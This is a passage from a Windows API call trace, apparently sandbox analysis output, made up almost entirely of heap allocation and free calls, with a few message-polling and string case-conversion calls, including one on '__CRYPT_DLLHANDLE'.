hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0129.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0129.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0129.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0129.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0129.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0129.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0129.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0129.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.161] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0129.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0129.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0129.162] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0129.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0129.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0129.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0129.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0129.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0129.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0129.164] CharLowerBuffW (in: lpsz="byte[43288]", cchLength=0xb | out: lpsz="byte[43288]") returned 0xb [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0129.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa918) returned 0x2ebfea0 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0129.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0129.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0129.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0129.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0129.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa916) returned 0x2eca7c0 [0129.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0129.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa916) returned 0x2ed50e0 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eca7c0 | out: hHeap=0x970000) returned 1 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed50e0 | out: hHeap=0x970000) returned 1 [0129.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0129.169] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0129.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0129.169] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0129.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0129.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0129.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0129.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0129.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0129.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0129.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0129.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0129.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0129.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0129.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0129.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0129.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0129.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0129.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0129.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0129.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 